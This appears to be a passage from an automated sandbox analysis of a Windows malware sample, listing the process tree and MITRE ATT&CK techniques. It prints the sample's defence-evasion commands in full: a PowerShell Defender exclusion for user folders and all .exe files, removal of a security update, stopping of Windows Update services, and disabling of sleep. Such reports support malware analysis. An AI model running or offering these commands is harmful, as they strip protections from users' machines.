C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3900

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4140

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
1⤵
PID:4692

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:5616

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:6124

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p
1⤵
PID:5168

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:2164

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:2256

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1652

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:3992

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:6092

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:3116

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:1036

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:2908

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
1⤵
PID:1624

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:1956

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3852

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
1⤵
- Drops file in Windows directory
PID:3076

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Checks processor information in registry
- Enumerates system info in registry
PID:3960

C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
1⤵
PID:684

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
1⤵
PID:4840

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
PID:2788

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
PID:5536

C:\ProgramData\Windows\explorer.exe
C:\ProgramData\Windows\explorer.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:1800
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:3452
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:6008
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:2176
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:1468
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:2004
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:5828
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:4824
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4916
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:4672
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:5796
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:5248
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4332
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:1568
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5860
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:368
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:1944
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1556
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  PID:4060
- C:\Windows\system32\dialer.exe
  C:\Windows\system32\dialer.exe
  2⤵
  PID:3704
- C:\Windows\system32\dialer.exe
  dialer.exe
  2⤵
  PID:5488

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
1⤵
PID:3444

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:736

C:\Windows\system32\BackgroundTaskHost.exe
"C:\Windows\system32\BackgroundTaskHost.exe" -ServerName:BackgroundTaskHost.WebAccountProvider
1⤵
PID:5756

C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
1⤵
- Drops file in Windows directory
PID:2416

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Create or Modify System Process

T1543

Windows Service

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

Modify Registry

Credential Access

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

System Information Discovery